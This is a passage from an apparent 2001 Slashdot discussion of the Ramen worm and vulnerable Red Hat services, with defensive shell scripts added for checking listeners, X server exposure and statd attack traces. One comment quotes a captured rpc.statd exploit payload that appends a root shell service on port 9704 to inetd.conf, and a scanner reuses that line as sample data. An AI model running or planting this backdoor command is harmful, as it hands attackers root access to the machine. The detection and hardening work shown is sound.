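# Demo on the constructed sample. On a live Red Hat box run:
#   netstat -ln | external_listeners
printf '%s\n' "$SAMPLE_NETSTAT" | external_listeners
```

On the sample this lists tcp 7 (echo), tcp 6000 (the X server) and udp 514 (syslog accepting remote messages), while the loopback-only SMTP socket is skipped; anything in that list that the box does not need is a service to turn off or firewall.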
  • One moderator, so far, thinks I'm trolling. Another moderator thinks I'm interesting.

    I think I've got a moderator following me around with an itchy finger on the "Overrated" trigger.

    Take heart, brother. :)

  • When are the distribution makers going to learn? wu-ftpd is riddled with bugs and security holes. Why does something like this come standard with the world's most popular Linux distribution?

    (Ideally it would come with proftpd, but with it disabled out-of-the-box...)
  • It should certainly be available as an ISO even if they don't want to go to the trouble and expense of changing their shrinkwrap version.

    HELL, they could even slap the disc on the outside of the box in a little envelope really...
  • I'm not sure whose comments you have been reading. Most of what I've seen has been helpful stuff about how this happened, what to do to keep it from happening and what to do if it has happened. The remedy should be familiar to anyone who's used MS ware: reinstall! There, however, the similarities between the Linux and the MS world end. What a great opportunity to slap around MS, thanks!

    Differences to be noted:
    1. Problem is presented quickly and fully.
    2. Problem can be prevented by changing text based config files.
    3. Problem can be patched at no cost.
    4. No cost was incurred to begin with. Who wants to bash volunteers?
    5. Reinstall will not subject you to licence keys, bogus copy protection schemes, and outright adverts like, "Everything you do will be easier and more fun. Be sure to register today!"

    The ranting seems to be all yours. Get thee hence, MicroTurd.

  • My RH7.0 box included an "Errata CD" along with a leaflet titled "Mandatory Errata Installation Instructions."

    The bad news is that it only contained the fixes for rhnsd (up2date). It would be nice if RH would continue to include full-fledged Errata CDs, rather than rely upon up2date, but I have a feeling that this was a one-time thing. Kudos to RH for stepping up, though.

    Ideally vendors would include pre-patched distributions when new disc manufacturing runs are ordered. The primary example I'm thinking of is Microsoft: it would have been nice for MSDN to include a Windows NT 4 SP 6 full install disc, rather than require you to install NT 4 and then service packs. (You can't even run Windows Update since NT4 includes IE2.0!)

  • these same types of vulnerabilities into their products time and time again. It's one thing when a vulnerability is truly ORIGINAL, but 99% of these are derivative and much older vulnerabilities that could have been detected IF someone checked for them. As a product of carelessness, sure it can happen, but for supposedly legendary "peer review" where thousands of programmers are supposed to check, it should RARELY ever happen. Yet RedHat and most other distributions never fail to release a new distribution with at least 5 remote vulnerabilities, many with the same services--over and over. I'd at least expect RedHat to check....

    Oh well, I've got to run. I believe in the POTENTIAL for Open Source to be a mechanism for secure code (at least for certain TYPES of code), but it's generally not happening today.
  • by Fjord ( 99230 ) on Wednesday January 17, 2001 @02:02PM (#500700) Homepage Journal
    RedHat claims that the wu-ftp bug (RHSA-2000-039-02 [redhat.com]) only affects RH5.2 and RH6.2
  • Except that RH7 isn't affected by this, and they have a page for RH7 security patches [redhat.com] that links to the appropriate RPMs, and one linking to this and other Bug fixes and package enhancements [redhat.com]
  • /me raises my hand

    When did the $50,000 they're offering for the person who can crack the system stop being worth it? Truth be known, I would probably be working on it if I had those kinds of skills. (Sorry boys and girls, I do data analysis). What's security cost anyway? And if you're a part of a company, how much do you think you would actually make from it? (Independent contractors would also be helpful.) But still, it's $50K! Seems like a lot of folks' stock options would be so far underwater that it would be worth it.
  • Suggest you check out the KRUD distribution -- based on RH 7.0; it's been endorsed by Eric S. Raymond & is explicitly targeted at tightening RH's security. It's at . I've got a yearly subscription & it's saved me a lot of hassle. My wu-ftpd for RH6.2 was patched long ago...
  • Okay, the link for KRUD is here [tummy.com].
  • Looks like one way is to just look for /usr/src/.poop directory since he doesn't mention that it cleans up that stuff.
  • by Colitis ( 8283 ) <jj.walker@noSpam.outlook.co.nz> on Wednesday January 17, 2001 @08:21PM (#500710)
    e_n_d_o said:

    A box with this config will produce the following: "netstat -l" has no externally open ports except echo. The only exception to this is when running X: port 6000 will be opened (personally I firewall this).

    I say:

    You don't need to firewall 6000 if you add "-nolisten tcp" to the end of the line that starts the X server. On the Mandrake system I'm currently using, with gdm as the login manager, it's in the servers section of /etc/X11/gdm/gdm.conf. If using xdm (or kdm) it's probably the last line in /etc/X11/xdm/Xservers. On FreeBSD, using xdm, it's in /usr/X11R6/lib/X11/xdm/Xservers.
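The "-nolisten tcp" fix above is easy to forget on a fresh install, so here is an added example (not from the thread, and not part of any distribution's tooling) that audits an xdm-style Xservers file for the flag and appends it where it is missing. It assumes the xdm/kdm Xservers format, one server per non-comment line; the gdm.conf layout the comment mentions is keyed differently and is not handled. The sample file content is constructed.

```shell
#!/bin/sh
# Added example: check an xdm-style Xservers file for "-nolisten tcp" and
# add the flag to every server line that lacks it.

# Constructed sample Xservers content (not copied from a real system).
SAMPLE_XSERVERS='# one local display, as shipped
:0 local /usr/X11R6/bin/X'

# x_tcp_status FILE: print "nolisten" if every active server line carries
# -nolisten tcp, otherwise "listening" (X will accept TCP on port 6000).
x_tcp_status() {
    if grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' \
        | grep -qv -- '-nolisten tcp'; then
        echo listening
    else
        echo nolisten
    fi
}

# x_add_nolisten FILE: append "-nolisten tcp" to each active server line
# that does not already have it, rewriting FILE through a temp file.
x_add_nolisten() {
    tmp="$1.tmp.$$"
    awk '/^[[:space:]]*#/ || /^[[:space:]]*$/ || /-nolisten tcp/ { print; next }
         { print $0 " -nolisten tcp" }' "$1" > "$tmp" && mv "$tmp" "$1"
}

# Demo on a temporary copy of the sample. On a real box point the two
# functions at /etc/X11/xdm/Xservers (after backing it up).
demo=$(mktemp)
printf '%s\n' "$SAMPLE_XSERVERS" > "$demo"
x_tcp_status "$demo"
x_add_nolisten "$demo"
x_tcp_status "$demo"
cat "$demo"
rm -f "$demo"
```

Run against the sample, the status goes from "listening" to "nolisten" and the server line ends up as ":0 local /usr/X11R6/bin/X -nolisten tcp"; the X server picks the change up at its next restart, so verify afterwards with the netstat check that port 6000 is gone.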
  • Unfortunately for Microsoft, they brought the bad publicity (and antitrust lawsuits) on themselves in their quests to integrate everything in their OS. While IIS was kind of an add-on (it came in an option pack) it is now built in windows 2000.

    One of the vulnerabilities is wu-ftpd. Made by Washington University, it runs on any unix.

    Also, in this case there were patches for these two vulnerabilities BEFORE this worm was even created.
  • by JCCyC ( 179760 ) on Wednesday January 17, 2001 @10:13AM (#500715) Journal
    What scares me is that RH7 still ships with the vulnerable, unpatched version of wu-ftpd. Wasn't that hole fixed ages ago?

    Hopping through CERT and eventually into Red Hat I found this [redhat.com]. Fixes only for RH5 and RH6 (RH7 didn't exist at the time). I can't get to RH's FTP to check the status for wu-ftpd in RH7 right now, but their list of security advisories for RH7 does not mention wu-ftpd.

  • This simply isn't true. RH7 shipped with wu-ftpd 2.6.1. According to WU-FTP [wu-ftpd.org] the bug only affects versions before 2.6.0. It also has 2.6.1 as the latest release.
  • by Anonymous Coward on Wednesday January 17, 2001 @10:15AM (#500717)
    You're right, in a sense. If this was happening to win2000/nt systems, a lot more people would be claiming that it represents a problem with the OS, instead of correctly interpreting it as a problem with admins not knowing how to set up their own systems.

    Thing is, these are not new exploits. They're known, and easily patched. Anyone who gets hit by this worm shouldn't be operating a web server.

  • [root@elite RedHat-7.0-RPMS]# ls -la wu-ftpd-2.6.1-6.i386.rpm
    -rw-r--r-- 1 root root 196336 Aug 30 18:16 wu-ftpd-2.6.1-6.i386.rpm

    As far as I know this is not vulnerable. The wu exploit that most people use has these offsets hardcoded:

    0 - RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
    1 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm

    So I do not think it is. The only exploit I know of for Red Hat 7 is the lpd one. AFAIK RH 7 does not even install inetd (xinetd) by default.

    r

  • In his analysis [home.net] he says RH7's vulnerability comes from LPRng, not wu-ftpd. A patched version of LPRng is offered as an update by Red Hat here [redhat.com].
  • Yes, I know I'm an idiot for not patching/firewalling my system. However, I got hacked (note, though, the servers I maintain did not get hacked, even though I'm relatively certain it was tried). I love getting 0wn3d. Oh well.
  • Sad to admit I had a box cracked with the rpc.statd exploit. The box wasn't anything particularly special, in fact, it was outside the firewall and expected to be cracked some time. Not a honeypot but just a server we didn't care if it did get cracked. Nothing seemed to have come of it and the box has since been rebuilt but for the interested, here is the log file the crack generated as caught by Logcheck [psionic.com]:

    rpc.statd[443]: SM_MON request for hostname containing '/': *INSERT BUNCH OF CRAPPY CHARACTERS*/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

    There were a lot of funky characters in the middle that slashdot wouldn't take.
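The Logcheck line in the comment above carries two indicators a defender can key on: the rpc.statd "SM_MON request for hostname containing '/'" message itself, and the line the payload appends to /etc/inetd.conf, a service whose server program is /bin/sh. The following is an added example, not from the thread or from Logcheck, that pulls both out of syslog and inetd.conf. The log lines and inetd.conf content are constructed, with the binary padding and the shell command in the hostname abridged; real entries will be longer.

```shell
#!/bin/sh
# Added example: scan syslog for rpc.statd SM_MON alerts and inetd.conf for
# entries that hand out a shell, the two traces the post above shows.

# Constructed syslog excerpt (abridged payload, not a real capture).
SAMPLE_SYSLOG="Jan 17 02:10:44 victim rpc.statd[443]: SM_MON request for hostname containing '/': [binary padding]/bin/sh -c [command appending a root shell to /etc/inetd.conf]
Jan 17 02:10:45 victim inetd[131]: Reloading configuration
Jan 17 02:11:02 victim sshd[812]: Accepted password for alice from 192.0.2.10"

# Constructed inetd.conf: one normal service plus the line such a payload appends.
SAMPLE_INETD="# <service> <socket> <proto> <flags> <user> <server> <args>
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
9704 stream tcp nowait root /bin/sh sh -i"

# statd_alerts: print syslog lines where rpc.statd rejected an SM_MON
# hostname containing '/'. rpc.statd logs this message itself; a hostname
# with a slash is the signature of the statd overflow attempt.
statd_alerts() {
    grep "rpc\.statd\[[0-9]*\]: SM_MON request for hostname containing '/'"
}

# inetd_shell_services: print "service user program" for every active
# inetd.conf entry whose server program is a shell. No legitimate service
# runs /bin/sh directly, so any hit is a planted backdoor.
inetd_shell_services() {
    awk '!/^[[:space:]]*#/ && NF >= 6 && $6 ~ /\/(ba)?sh$/ { print $1, $5, $6 }'
}

# Demo on the constructed samples. On a live box use
#   statd_alerts < /var/log/messages
#   inetd_shell_services < /etc/inetd.conf
printf '%s\n' "$SAMPLE_SYSLOG" | statd_alerts
printf '%s\n' "$SAMPLE_INETD" | inetd_shell_services
```

On the samples the first function returns the single rpc.statd line and the second prints "9704 root /bin/sh". A hit on either is reason to treat the box as compromised and rebuild, as the poster did, rather than just delete the inetd.conf line.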
  • by ryanr ( 30917 ) <ryan@thievco.com> on Wednesday January 17, 2001 @10:27AM (#500723) Homepage Journal
    For which, the Ramen worm? It also uses the LPD hole, in RH7.0. Check out this comment:
    http://slashdot.org/comments.pl?sid=01/01/17/1836235&cid=12 [slashdot.org] by the guy who posted a well-done analysis to the incidents list.
  • I know it's been discussed before, but wouldn't it be useful for someone to hack the worm to run around and close up the security holes without damaging the system? It could use an exploit to gain root, rpm -U the packages, do a bandwidth-limited scan for 24 hours and then clean up after itself.
  • by Rudeboy777 ( 214749 ) on Wednesday January 17, 2001 @10:29AM (#500726)
    It's pretty sloppy for RH to leave security fixes for these holes out of 7.0, but anyone running a server on a high-bandwidth line should probably know enough to get security updates frequently. Nobody deserves to get hacked, but you need to expect the worst as a sys admin. Leaving the default install on a server is absolutely amateurish.
  • by Speare ( 84249 ) on Wednesday January 17, 2001 @12:12PM (#500727) Homepage Journal

    I expect this'll get modded down, but...

    It seems that the RedHat exploit is at least as big a story as the Honeypot project. While they're both 'cracker' related, one is an opt-in research project and one is an advisory news item.

    Don't they deserve separate top-level stories to clear it up? This isn't some downgraded Slashback or quickies thing. Both deserve their own thread.

    Or is it just negative news about a pet issue, getting swept into a little dark corner at the end of something else?

  • However, that's a lot for 100 Megs of stuff. A CD would STILL be very useful.
  • I read your write up. Interesting stuff there. My question is how do I determine if a system has been hit? Are there telltale log entries or will netstat show unusual connections?
  • There goes the assertion/urban myth that Linux was proof against virii and such.
    A "worm" isn't a virus. A virus is a hidden executable that spreads within a computer. A worm is a script or program that hits a computer and then goes to other computers. All this is is a script that attacks network services, sends an email and then looks for other computers. There is a difference.

    SealBeater
  • the person who successfully hacks a system can win $50,000 while in an unrelated contest the person who can track down a hacker wins a copy of McGraw-Hill's Hacking Exposed, a $28 value?

  • Maybe because it's really two pieces of third-party software and not linux (the kernel) that are the cause of the vulnerability?

    Maybe because patches have been available BEFORE this worm even came into existence?

    Just a few thoughts... Don't get me wrong, this stuff is bad but it's hard for me to get as excited about it as I have been about the MS bugs.
  • by Masem ( 1171 ) on Wednesday January 17, 2001 @10:45AM (#500745)
    It's being said that it isn't that bad because it doesn't destroy data itself, it merely unloads codes and tries to find more sites to unload more codes.

    But reading the advisories, it suggests that the unloaded code not only is a standard script kiddie root pack, but also emails to some sites, most likely the information on how the box reporting can be further hacked. It can tie up your internet connection since the portscanning that it appears to be doing is rapid. It also rewrites the default index page of the server (assuming you use default installs) with that "powered by raman noodles" page.

    Which means that if you have this on your system, the only precaution you can take is a full system reinstall lest you be "0wn3d" in the future, because some script kiddie somewhere has a way into root on your box.

    So this is VERY dangerous as there's a potential for abuse, but that has to be initiated by a human contact, which downgrades this from a virus to a worm. As others have said, if the rootpack had a simple "rm -rf /" or similarly damaging command in its script, it would be a virus.
